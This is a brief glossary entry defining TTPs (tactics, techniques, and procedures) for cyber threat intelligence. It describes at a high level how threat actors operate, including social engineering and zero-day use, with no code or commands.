TTPs (tactics, techniques, and procedures)

Definition: TTPs (tactics, techniques, and procedures)

TTPs analyze how a malicious actor operates, they describe how cyber attackers orchestrate, execute and manage operational attacks. TTPs contextualize a threat. They reveal the steps or actions taken by malicious actors when exfiltrating data, for example.

To understand and fight your enemy you need to understand their techniques, tactics and procedures.

Tactical: This is the way the threat actor operates. It is the highest level of behavior.

Example the attacker uses social engineering, or physical infiltration into an organization, information gathered from the Internet…or the attacker can use Zero-Day vulnerabilities, or his own tools…

Technical: corresponds to the tools used for information gathering or compromise. This is a more detailed description.

Procedure : it is a special sequence of actions

According to the Definitive Guide to Cyber Threat Intelligence, they are “patterns of activities or methods associated with a specific threat actor or group of threat actors“.